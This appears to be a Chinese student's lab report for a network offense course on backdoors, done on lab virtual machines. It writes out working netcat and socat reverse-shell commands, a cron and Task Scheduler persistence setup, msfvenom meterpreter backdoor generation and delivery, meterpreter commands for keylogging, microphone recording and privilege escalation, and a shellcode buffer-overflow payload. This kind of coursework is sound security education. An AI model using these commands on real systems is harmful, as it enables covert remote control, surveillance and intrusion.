2019-2020-2 20175222 《网络对抗技术》 Exp2 后门原理与实践
实验内容
- 使用netcat获取主机操作Shell,cron启动 (0.5分)
- 使用socat获取主机操作Shell, 任务计划启动 (0.5分)
- 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
- 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
- 可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。
基础问题回答
-
例举你能想到的一个后门进入到你系统中的可能方式?
答:伪装成其他应用的运行程序,欺骗用户下载。
-
例举你知道的后门如何启动起来(win及linux)的方式?
答:设定后门程序触发条件,到达特定时间时,后门程序启动。
Windows 修改注册表,Linux 替换网络服务等等。
-
Meterpreter有哪些给你映像深刻的功能?
答:获取音频,截屏,进行提权,窃取隐私。
-
如何发现自己有系统有没有被安装后门?
答:运行杀毒软件、防火墙,检查进程、端口、注册表、网络通信状况等等。
预备
1. 固定 IP
-
Kali 虚拟机桥接模式固定 IP 为:192.168.28.129
-
Windows 10 宿主机固定 IP 为:192.168.0.110
2. SSH 远程登录
PasswordAuthentication,PermitRootLogin为yes仍无法验证密码,登录失败,上网查找方法,历经两小时多次尝试后无果,为了不耽误后续实验,放弃了远程操作。
3. Windows 获得 linux 的 shell
-
在 Windows 使用
netcat
程序监听本机的5222
端口.\nc64.exe -l -p 5222,这里用windows powershell无法直接运
行nc64.exe,需要使用.\nc64.exe
-
在 linux 中反弹连接 Windows ,
nc 192.168.0.110 5222 -e /bin/sh
,使用-e
选项执行shell
程序
4. linux 获得 Windows 的 shell
-
在linux端使用
nc -l -p 5222
指令监听5222
端口 -
在Windows下,使用 .\
nc64.exe -e powershell.exe 192.168.28.129 5222
指令反向连接 linux 主机的5222
端口 -
结果:左边 Windows PowerShell ,右边 Kali Shell
5. 使用nc指令传输数据
- Windows 下使用 .\
nc.exe -L -p 5222
指令监听 5222 端口,-l指令无法运行,上网查询后改用了-L -p - linux 使用
nc 192.168.0.110 5222
指令反弹连接到Windows的 5222 端口
6. nc传输文件
-
linux 向 Windows 中传输文件
- Windows中通过.\
nc64.exe -l -p 5222> file1.out
监听 5222端口 - linux 反弹连接 Windows 的 5222 端口
nc 192.168.0.110 5222 < file1.in
,Windows可以收到 linux 发来的文件。
- Windows中通过.\
-
Windows 向 linux 中传输文件同理。
实验
一
使用netcat获取主机操作Shell,cron启动
windows使用 ncat.exe -l -p 5222
监听 5222 端口。
Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。
-
crontab
指令增加一条定时任务,-e
表示编辑。在最后一行添加 50* * * * /bin/netcat 192.168.0.110 5222 -e /bin/sh
每个时间段的第50分钟反向连接 Windows 主机的 5222 端口。 -
时间到了 23:50 ,此时已获得了 Kali 的 shell ,使用ls查看目录
二
使用socat获取主机操作Shell, 任务计划启动
-
右键windows ,找到计算机管理 ,在系统工具找到任务计划程序,创建任务
-
常规
中填写任务名称,点击触发器
然后新建触发器
,设置触发时间点。
-
在
操作
中,导入下载解压后的socat.exe的路径,在添加参数
中填入tcp-listen:5222 exec:cmd.exe,pty,stderr
(把cmd.exe
绑定到端口 5222 ,同时把cmd.exe
的stderr
重定向到stdout
上),创建完成之后,点击确定。
-
先锁定计算机,然后重新进入计算机,
socat
就会启动 -
在kali中输入
socat - tcp:192.168.0.110:5222
(-
代表标准的输入输出,第二个流连接到Windows主机的5222端口,IP为windows的IP),成功获得cmd shell
三
使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell。
说明
我的win10存在未知问题,无法运行程序
更换为Windows 7 虚拟机后进行操作
Windows 7固定ip
- 在 kali 中输入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.28.129 LPORT=5222 -f exe > 20175222_backdoor.exe
(IP为kali的IP)生成后门程序20175222_backdoor.exe
。 - 在Windows中使用nc.exe -lv -p 5222 > 20175222_backdoor.exe 然后等待。
- kali中输入nc 192.168.28.131 5222 < 20175222_backdoor.exe(此处的IP为Windows的IP)将生成的后门程序传送到Windows主机,传输成功。
-
在linux中另外打开一个终端,
msfconsole
进入控制台 -
输入
use exploit/multi/handler
使用监听模块,设置payload -
使用和生成后门程序时相同的payload:
set payload windows/meterpreter/reverse_tcp
-
set LHOST 192.168.28.129
此处为kali的IP(和生成后门程序时指定的IP相同) -
端口号也相同:
set LPORT 5222
-
设置完成后,
exploit
开始监听 -
kali获得Windows主机的连接,并且得到了远程控制的shell
四
使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权。
-
截取音频:
record_mic
-
获取摄像头拍照:
webcam_snap
虚拟机无法调用笔记本的内置摄像头,操作不能实现
-
截屏:
screenshot
-
记录击键的过程:
keyscan_start
读取击键的记录:keyscan_dump
-
查看当前用户:
getuid
,提取权限:getsystem
附加内容
使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
-
主要步骤同实验一,无需赘述。
关闭地址随机化:
execstack -s pwn1 //设置堆栈可执行 execstack -q pwn1 //查询文件的堆栈是否可执行 more /proc/sys/kernel/randomize_va_space //查看地址随机化的状态 echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
-
gdb
调试
-
根据 %esp 值 + 4 = 0xffffd584
-
由此更改注入代码前 4 个
\x
数据。 -
perl -e 'print "A" x 32;print"\x84\xd5\xff\xff\x90\x90\x90\x90\x90\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_2
-
在另终端中先启动
msfconsole
-
use exploit/multi/handler 用于设置
-
payload set payload linux/x86/shell_reverse_tcp set LHOST 127.0.0.1
设置IP为回环地址
-
set LPORT 4444
根据代码设置端口
-
exploit 设置完成开始监听
-
返回这一终端中后执行:
(cat input_2;cat) | ./pwn1
,成功获得shell 。
实验总结与体会
ssh遇到的问题是输入密码无法登录,弹出Permission denied, please try again,这个问题按道理只要更改/etc/ssh/sshd_config中内容为PermitRootLogin yes就可以解决,但不知道为什么反复尝试都无法解决,包括重装ssh服务,按资料修改更多文件内容。因为ssh服务不会影响实验进行,所以最后选择放弃。
一开始在msfconsole中使用exploit指令失败,发现是use exploit/multi/handler没有生效,重装msfconsole后解决。
基本上实验没有遇到太大的问题,都能顺利完成。这次学习的netcat,socat,MSF meterpreter算是正式开始了解对抗技术了,我还是非常感兴趣的,希望接下来的课程能学到更多有用的知识。